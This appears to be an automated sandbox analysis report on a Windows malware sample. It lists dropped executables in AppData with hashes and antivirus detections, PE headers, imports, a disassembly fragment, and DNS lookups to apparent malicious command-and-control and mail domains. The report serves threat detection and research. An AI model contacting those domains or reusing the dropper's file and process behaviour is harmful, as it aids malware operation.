Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......v.bi2..:2..:2..:.b.:3..:t..:...:t..:+..:t..:...:;..::..:;..:3..:;..:...:2..:...:.\.:b..:.\.:3..:?..:3..:2.:3..:.\.:3..:Rich2..:................PE..d.....ge.........."...........z.....,..........@.....................................e....`...@...............@.............................h...\|.........w......i..............\|.......................................p............... ............................text............................... ..`.rdata..............................@..@.data...0........^..................@....pdata...i.......j..................@..@.rsrc.....w.......w..j..............@..@.reloc..\|............z..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\tdhvrsu

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	297984
Entropy (8bit):	6.038801621407422
Encrypted:	false
SSDEEP:	3072:CDoxfGnmcz040EWCiMMoLQOHgHlxf7kInI5tiYDFUXgUM:PfGFz040nUK7PpQG4
MD5:	F7B08E0D5053C01E5792AB9B8DCB1F11
SHA1:	C620FDFBCFC6D49884DE01D24652890333616A04
SHA-256:	2907C623B4AD8A369B8215407E36FADD7A60182C20B61E7624AEB2223E5B157F
SHA-512:	8A57D31ADD5ECCDEACD011EB7B0108D46096C5A38A7302CB4A4D796B6E8E6C18F9FEE6C0B0B301A0E3DB9C182CE65CD3A1715E904EEA7ACF9D01F3B5496B5AF4
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L.....fc......................i.....B7............@...........................k......>..........................................x.....j.............................................................@'..@............................................text...,........................... ..`.data...\|Ug.........................@....rsrc.........j.....................@..@........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\thedcsd

Download File

Process:	C:\Windows\explorer.exe
File Type:	data
Category:	dropped
Size (bytes):	248887
Entropy (8bit):	7.999332648996017
Encrypted:	true
SSDEEP:	6144:nSb1kNoYGYYRSxBQsgb6m92wdaDR19IDy8UFDW3DNS:Sb1eANSx6DX9aXiO5q3DQ
MD5:	4AB754F99D5BBAA46137D59A58604842
SHA1:	3A5E71757B190ECFF3A05334AA3180F2FFEA5116
SHA-256:	854214FE35DDBD7B0DA1C06A734B733441B66ABBE2916AC2E48F4DD209E6FA3B
SHA-512:	B0C8B1027D1EDDFCE1B41355E95F618816EF06F9F03942F73BC3AAF86626725BAA21B2E40E662F467ECE8844FA4D3AFC28816FE236E5BD777821CF074BFE149C
Malicious:	false
Preview:	....C.a.....=..V......p.HB.KI......>.\.......p..C.P.=...........e]2..t..Y..+.x.........P}...wW...q.t,..G.0SU]....2....H.0.....4.O....O.......BZ...S..`d........N....tA/...$/....&Y{.S0G.6.U}..)du...{...=..>.\.F.{....E.....{..K.\.W0/K;...]2........Z..j.d.L..5...{.U..~2.qj...k...oL.9Y1..+....AV".3..M.......[....@. ;b..1._......fj..$..j>yJ .......$.Os..#.ld..!......C-qL.I.Pi.z.......".....R..<.F.z%....H...X)cVV..Z.b..}&..Y!.\....H...n..T...I.^.M...^.oO.......8.l....3~.-...R...qhp.3.l......J.(......xM......"D.x.yQ..K...c.}...-Z.K.\N.....Z.a...."...N..hpa(A.Ay.a.hT.......G.......+....[a...tLw....6...=`.4l~.P.&I*.,=G.6......yJ[Z.Z..(..c..,.......M.S...5-.O..A...W..'!".=.N..i0...p..=.$./..#...R.....,.IJ.Em...pl./..m..k=..,.c.....\..... ..^l(....zS)]z...<T.\|......O.\|%.......C.K...@..`q..f..f....H....n..,..RZ..X...Kj.c@X.G.]......[c..u.q-...mm.p........%.xH~W....'.!^1w.7&/...\|....D...0XH.. ....k!3..rJ........"...a......IZ...Fi....+

C:\Users\user\AppData\Roaming\vahvrsu

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	299008
Entropy (8bit):	6.054116024221601
Encrypted:	false
SSDEEP:	3072:2ubxsGXA8pMBDDk1DjOo2owKELA3JfvY42YRfXZz15QLUXgUM:BsGXA7Bs1DjnDYA3Jfg+Rh4g4
MD5:	D05323747875E19243C7B15791BCAA1E
SHA1:	EF868FA846B3FFADFE311E91714C61E460D1BE35
SHA-256:	37F806898C3A9CAD02A28645644F22E22B761E72A82758881B495691DD4D0097
SHA-512:	FC3129BDCB3B5EDDCD2D56696B9350E9339E480F55B71238DE38B4C999949C21CC13B4A3FB7DB20E9946181DC6A8A391AC432ABC9DE519C4D235E42A437E79F8
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 49%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L.....+d......................i.....B7............@...........................k......*......................................D...x.....j.............................................................@'..@............................................text............................... ..`.data...\|Ug.........................@....rsrc.........j.....................@..@........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\vahvrsu:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

\Device\ConDrv

Download File

Process:	C:\Users\user\AppData\Local\Temp\CL_Debug_Log.txt
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	623
Entropy (8bit):	5.103632053006291
Encrypted:	false
SSDEEP:	12:p8vDh5Rwsfy0TAf+YfXs8ooKk+c4YN3JnAI0l3NH:pGdLwsfy0TAf1fXsXk+cfptAIE35
MD5:	D2407A181B5CF030CEC3926E67ACD2E3
SHA1:	AF9F2EAF1BC0805C6C5D3FC89FCDB3A1E1964790
SHA-256:	CCE73E29516755BA48C43078153C0DF706F1450EEF779F7B1B5E405392C3E350
SHA-512:	246CA6444C840E7868C51CB418134240698C95B788EDBEE14B5EA025266E9FA3800B22BF93256840AD010F85676A34C3CB50C44ABF053CBB4C8B19118C1F345F
Malicious:	false
Preview:	..7-Zip (a) 19.00 (x86) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21....Scanning the drive for archives:.. 0M Scan C:\Users\user\AppData\Local\Temp\. .1 file, 15343298 bytes (15 MiB)....Extracting archive: C:\Users\user\AppData\Local\Temp\CR_Debug_Log.txt..--..Path = C:\Users\user\AppData\Local\Temp\CR_Debug_Log.txt..Type = 7z..Physical Size = 15343298..Headers Size = 210..Method = LZMA2:24 BCJ 7zAES..Solid = +..Blocks = 1.... 0%. . 48%. .100% 1 - 64.exe. .100% 2. .Everything is Ok....Files: 2..Size: 16479232..Compressed: 15343298..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.054116024221601
TrID:	Win32 Executable (generic) a (10002005/4) 99.51% InstallShield setup (43055/19) 0.43% Clipper DOS Executable (2020/12) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02%
File name:	file.exe
File size:	299'008 bytes
MD5:	d05323747875e19243c7b15791bcaa1e
SHA1:	ef868fa846b3ffadfe311e91714c61e460d1be35
SHA256:	37f806898c3a9cad02a28645644f22e22b761e72a82758881b495691dd4d0097
SHA512:	fc3129bdcb3b5eddcd2d56696b9350e9339e480f55b71238de38b4c999949c21cc13b4a3fb7db20e9946181dc6a8a391ac432abc9de519c4d235e42a437e79f8
SSDEEP:	3072:2ubxsGXA8pMBDDk1DjOo2owKELA3JfvY42YRfXZz15QLUXgUM:BsGXA7Bs1DjnDYA3Jfg+Rh4g4
TLSH:	A054D45382F17D44E9268B729F2FB6ECB75EF6508ECA776912189E2F40B1172C263710
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L.....+d...

File Icon


Icon Hash:	7141512149404443

Static PE Info

General

Entrypoint:	0x403742
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x642B9095 [Tue Apr 4 02:51:01 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	52c989b623059b029b98f089e46c54ff

Entrypoint Preview

Instruction
call 00007F44B51D134Dh
jmp 00007F44B51CE86Dh
int3
int3
int3
int3
mov edx, dword ptr [esp+0Ch]
mov ecx, dword ptr [esp+04h]
test edx, edx
je 00007F44B51CEA5Bh
xor eax, eax
mov al, byte ptr [esp+08h]
test al, al
jne 00007F44B51CEA08h
cmp edx, 00000100h
jc 00007F44B51CEA00h
cmp dword ptr [02A9F448h], 00000000h
je 00007F44B51CE9F7h
jmp 00007F44B51D1405h
push edi
mov edi, ecx
cmp edx, 04h
jc 00007F44B51CEA23h
neg ecx
and ecx, 03h
je 00007F44B51CE9FEh
sub edx, ecx
mov byte ptr [edi], al
add edi, 01h
sub ecx, 01h
jne 00007F44B51CE9E8h
mov ecx, eax
shl eax, 08h
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 03h
shr ecx, 02h
je 00007F44B51CE9F8h
rep stosd
test edx, edx
je 00007F44B51CE9FCh
mov byte ptr [edi], al
add edi, 01h
sub edx, 01h
jne 00007F44B51CE9E8h
mov eax, dword ptr [esp+08h]
pop edi
ret
mov eax, dword ptr [esp+04h]
ret
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
mov dword ptr [0042B6E4h], eax
mov dword ptr [0042B6E8h], eax
mov dword ptr [0042B6ECh], eax
mov dword ptr [0042B6F0h], eax
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
mov ecx, dword ptr [0042A4D4h]
push esi
cmp dword ptr [eax+04h], edx
je 00007F44B51CEA01h
mov esi, ecx
imul esi, esi, 0Ch
add esi, dword ptr [ebp+08h]
add eax, 0Ch
cmp eax, esi

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x29544	0x78	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x26a0000	0x1e380	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x11f0	0x1c	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2740	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1b8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x28fbc	0x29000	False	0.6888100228658537	data	6.844566928356145	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x2a000	0x267557c	0x1800	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x26a0000	0x1e380	0x1e400	False	0.3649841813016529	data	4.15065227897746	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x26a0930	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Punjabi	Pakistan	0.4066820276497696
RT_ICON	0x26a0930	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Punjabi	India	0.4066820276497696
RT_ICON	0x26a0ff8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Punjabi	Pakistan	0.1658713692946058
RT_ICON	0x26a0ff8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Punjabi	India	0.1658713692946058
RT_ICON	0x26a35a0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Punjabi	Pakistan	0.2127659574468085
RT_ICON	0x26a35a0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Punjabi	India	0.2127659574468085
RT_ICON	0x26a3a38	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Punjabi	Pakistan	0.43443496801705755
RT_ICON	0x26a3a38	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Punjabi	India	0.43443496801705755
RT_ICON	0x26a48e0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Punjabi	Pakistan	0.5532490974729242
RT_ICON	0x26a48e0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Punjabi	India	0.5532490974729242
RT_ICON	0x26a5188	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Punjabi	Pakistan	0.5852534562211982
RT_ICON	0x26a5188	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Punjabi	India	0.5852534562211982
RT_ICON	0x26a5850	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Punjabi	Pakistan	0.6054913294797688
RT_ICON	0x26a5850	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Punjabi	India	0.6054913294797688
RT_ICON	0x26a5db8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Punjabi	Pakistan	0.44491701244813275
RT_ICON	0x26a5db8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Punjabi	India	0.44491701244813275
RT_ICON	0x26a8360	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Punjabi	Pakistan	0.4927298311444653
RT_ICON	0x26a8360	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Punjabi	India	0.4927298311444653
RT_ICON	0x26a9408	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Punjabi	Pakistan	0.5195035460992907
RT_ICON	0x26a9408	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Punjabi	India	0.5195035460992907
RT_ICON	0x26a98d8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Punjabi	Pakistan	0.5157249466950959
RT_ICON	0x26a98d8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Punjabi	India	0.5157249466950959
RT_ICON	0x26aa780	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Punjabi	Pakistan	0.5040613718411552
RT_ICON	0x26aa780	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Punjabi	India	0.5040613718411552
RT_ICON	0x26ab028	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Punjabi	Pakistan	0.45161290322580644
RT_ICON	0x26ab028	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Punjabi	India	0.45161290322580644
RT_ICON	0x26ab6f0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Punjabi	Pakistan	0.4819364161849711
RT_ICON	0x26ab6f0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Punjabi	India	0.4819364161849711
RT_ICON	0x26abc58	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Punjabi	Pakistan	0.28060165975103735
RT_ICON	0x26abc58	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	Punjabi	India	0.28060165975103735
RT_ICON	0x26ae200	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Punjabi	Pakistan	0.3098030018761726
RT_ICON	0x26ae200	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	Punjabi	India	0.3098030018761726
RT_ICON	0x26af2a8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Punjabi	Pakistan	0.3336065573770492
RT_ICON	0x26af2a8	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2304	Punjabi	India	0.3336065573770492
RT_ICON	0x26afc30	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Punjabi	Pakistan	0.37322695035460995
RT_ICON	0x26afc30	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	Punjabi	India	0.37322695035460995
RT_ICON	0x26b0110	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Punjabi	Pakistan	0.4933368869936034
RT_ICON	0x26b0110	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Punjabi	India	0.4933368869936034
RT_ICON	0x26b0fb8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Punjabi	Pakistan	0.47382671480144406
RT_ICON	0x26b0fb8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Punjabi	India	0.47382671480144406
RT_ICON	0x26b1860	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Punjabi	Pakistan	0.430635838150289
RT_ICON	0x26b1860	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Punjabi	India	0.430635838150289
RT_ICON	0x26b1dc8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Punjabi	Pakistan	0.2798755186721992
RT_ICON	0x26b1dc8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Punjabi	India	0.2798755186721992
RT_ICON	0x26b4370	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Punjabi	Pakistan	0.28846153846153844
RT_ICON	0x26b4370	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Punjabi	India	0.28846153846153844
RT_ICON	0x26b5418	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Punjabi	Pakistan	0.305327868852459
RT_ICON	0x26b5418	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Punjabi	India	0.305327868852459
RT_ICON	0x26b5da0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Punjabi	Pakistan	0.33687943262411346
RT_ICON	0x26b5da0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Punjabi	India	0.33687943262411346
RT_ICON	0x26b6270	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Punjabi	Pakistan	0.28038379530916846
RT_ICON	0x26b6270	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Punjabi	India	0.28038379530916846
RT_ICON	0x26b7118	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Punjabi	Pakistan	0.3722924187725632
RT_ICON	0x26b7118	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Punjabi	India	0.3722924187725632
RT_ICON	0x26b79c0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Punjabi	Pakistan	0.396889400921659
RT_ICON	0x26b79c0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Punjabi	India	0.396889400921659
RT_ICON	0x26b8088	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Punjabi	Pakistan	0.38945086705202314
RT_ICON	0x26b8088	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Punjabi	India	0.38945086705202314
RT_ICON	0x26b85f0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Punjabi	Pakistan	0.27686721991701246
RT_ICON	0x26b85f0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Punjabi	India	0.27686721991701246
RT_ICON	0x26bab98	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Punjabi	Pakistan	0.3022983114446529
RT_ICON	0x26bab98	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Punjabi	India	0.3022983114446529
RT_ICON	0x26bbc40	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Punjabi	Pakistan	0.3274590163934426
RT_ICON	0x26bbc40	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Punjabi	India	0.3274590163934426
RT_ICON	0x26bc5c8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Punjabi	Pakistan	0.3546099290780142
RT_ICON	0x26bc5c8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Punjabi	India	0.3546099290780142
RT_STRING	0x26bcd48	0x270	data	Punjabi	Pakistan	0.5144230769230769
RT_STRING	0x26bcd48	0x270	data	Punjabi	India	0.5144230769230769
RT_STRING	0x26bcfb8	0x4fa	data	Punjabi	Pakistan	0.4466248037676609
RT_STRING	0x26bcfb8	0x4fa	data	Punjabi	India	0.4466248037676609
RT_STRING	0x26bd4b8	0x650	data	Punjabi	Pakistan	0.4344059405940594
RT_STRING	0x26bd4b8	0x650	data	Punjabi	India	0.4344059405940594
RT_STRING	0x26bdb08	0x4a8	data	Punjabi	Pakistan	0.4521812080536913
RT_STRING	0x26bdb08	0x4a8	data	Punjabi	India	0.4521812080536913
RT_STRING	0x26bdfb0	0x3cc	data	Punjabi	Pakistan	0.4588477366255144
RT_STRING	0x26bdfb0	0x3cc	data	Punjabi	India	0.4588477366255144
RT_ACCELERATOR	0x26bcaa8	0x40	data	Punjabi	Pakistan	0.890625
RT_ACCELERATOR	0x26bcaa8	0x40	data	Punjabi	India	0.890625
RT_ACCELERATOR	0x26bcae8	0x38	data	Punjabi	Pakistan	0.8928571428571429
RT_ACCELERATOR	0x26bcae8	0x38	data	Punjabi	India	0.8928571428571429
RT_GROUP_ICON	0x26a9870	0x68	data	Punjabi	Pakistan	0.6826923076923077
RT_GROUP_ICON	0x26a9870	0x68	data	Punjabi	India	0.6826923076923077
RT_GROUP_ICON	0x26a3a08	0x30	data	Punjabi	Pakistan	0.9375
RT_GROUP_ICON	0x26a3a08	0x30	data	Punjabi	India	0.9375
RT_GROUP_ICON	0x26b0098	0x76	data	Punjabi	Pakistan	0.6779661016949152
RT_GROUP_ICON	0x26b0098	0x76	data	Punjabi	India	0.6779661016949152
RT_GROUP_ICON	0x26bca30	0x76	data	Punjabi	Pakistan	0.6864406779661016
RT_GROUP_ICON	0x26bca30	0x76	data	Punjabi	India	0.6864406779661016
RT_GROUP_ICON	0x26b6208	0x68	data	Punjabi	Pakistan	0.7211538461538461
RT_GROUP_ICON	0x26b6208	0x68	data	Punjabi	India	0.7211538461538461
RT_VERSION	0x26bcb20	0x228	data	Punjabi	Pakistan	0.5362318840579711
RT_VERSION	0x26bcb20	0x228	data	Punjabi	India	0.5362318840579711

Imports

DLL	Import
KERNEL32.dll	LoadResource, GetCurrentProcess, CreateJobObjectW, InterlockedCompareExchange, SignalObjectAndWait, GetComputerNameW, GetModuleHandleW, GetTickCount, FormatMessageA, GetWindowsDirectoryA, EnumTimeFormatsA, GetDateFormatA, TzSpecificLocalTimeToSystemTime, GetVolumePathNameW, GlobalAlloc, SetFileShortNameW, GlobalFindAtomA, GetConsoleAliasExesLengthW, SetConsoleCursorPosition, CreateFileW, LCMapStringA, GetConsoleAliasesW, OpenMutexW, GetLastError, SetLastError, GetProcAddress, BackupWrite, HeapUnlock, RemoveDirectoryA, SetComputerNameA, LoadLibraryA, InterlockedExchangeAdd, CreateFileMappingA, CreateFileMappingW, FindFirstVolumeMountPointW, SetThreadIdealProcessor, FoldStringA, VirtualProtect, CompareStringA, GetCurrentThreadId, OpenSemaphoreW, EndUpdateResourceA, TerminateJobObject, GlobalAddAtomW, ReadConsoleOutputCharacterW, TlsGetValue, FindVolumeClose, EnumDateFormatsExW, VirtualAlloc, GetNativeSystemInfo, UnhandledExceptionFilter, SetUnhandledExceptionFilter, Sleep, ExitProcess, GetCommandLineA, GetStartupInfoA, WriteFile, GetStdHandle, GetModuleFileNameA, RaiseException, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, InterlockedDecrement, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, TerminateProcess, IsDebuggerPresent, InitializeCriticalSectionAndSpinCount, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, HeapCreate, VirtualFree, HeapFree, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetModuleHandleA, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, RtlUnwind, HeapSize, GetLocaleInfoA, HeapAlloc, HeapReAlloc, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW
USER32.dll	GetMessageExtraInfo, CharUpperW, DdeQueryStringA
GDI32.dll	CreateCompatibleBitmap, GetDeviceGammaRamp
ADVAPI32.dll	SetKernelObjectSecurity
ole32.dll	StringFromCLSID

Possible Origin

Language of compilation system	Country where language is spoken	Map
Punjabi	Pakistan
Punjabi	India

Network Behavior

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 30, 2023 11:19:26.421719074 CET	192.168.2.4	1.1.1.1	0x97c3	Standard query (0)	onualituyrs.org	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:26.722207069 CET	192.168.2.4	1.1.1.1	0x577e	Standard query (0)	sumagulituyo.org	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:27.730520964 CET	192.168.2.4	1.1.1.1	0x577e	Standard query (0)	sumagulituyo.org	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:28.746177912 CET	192.168.2.4	1.1.1.1	0x577e	Standard query (0)	sumagulituyo.org	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:29.313361883 CET	192.168.2.4	1.1.1.1	0x5033	Standard query (0)	snukerukeutit.org	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:30.326679945 CET	192.168.2.4	1.1.1.1	0xfa64	Standard query (0)	lightseinsteniki.org	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:32.812136889 CET	192.168.2.4	1.1.1.1	0x830f	Standard query (0)	liuliuoumumy.org	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:34.239514112 CET	192.168.2.4	1.1.1.1	0x824a	Standard query (0)	stualialuyastrelia.net	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:48.284631968 CET	192.168.2.4	1.1.1.1	0x1d9c	Standard query (0)	2no.co	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:51.356154919 CET	192.168.2.4	1.1.1.1	0xcdda	Standard query (0)	atozrental.cc	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:52.371329069 CET	192.168.2.4	1.1.1.1	0xcdda	Standard query (0)	atozrental.cc	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:19:53.372193098 CET	192.168.2.4	1.1.1.1	0xcdda	Standard query (0)	atozrental.cc	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:20:28.853488922 CET	192.168.2.4	1.1.1.1	0xf211	Standard query (0)	humydrole.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:20:29.846278906 CET	192.168.2.4	1.1.1.1	0xf211	Standard query (0)	humydrole.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:20:30.855828047 CET	192.168.2.4	1.1.1.1	0xf211	Standard query (0)	humydrole.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:34.233207941 CET	192.168.2.4	1.1.1.1	0x1976	Standard query (0)	hot13l.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.238487959 CET	192.168.2.4	1.1.1.1	0xf832	Standard query (0)	wr.omt222lil.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.240398884 CET	192.168.2.4	1.1.1.1	0x7b4e	Standard query (0)	osrniamadvea.lrhzda.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.240730047 CET	192.168.2.4	1.1.1.1	0x67fe	Standard query (0)	tbsayail.co.uk	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.241518974 CET	192.168.2.4	1.1.1.1	0xcd89	Standard query (0)	gmaigcmar19l.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.242850065 CET	192.168.2.4	1.1.1.1	0xb929	Standard query (0)	23xd5a.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:22:34.243448019 CET	192.168.2.4	1.1.1.1	0x7d3	Standard query (0)	phcg87k6barre352odseba.dcivenail.com	MX (Mail exchange)	IN (0x0001)	false
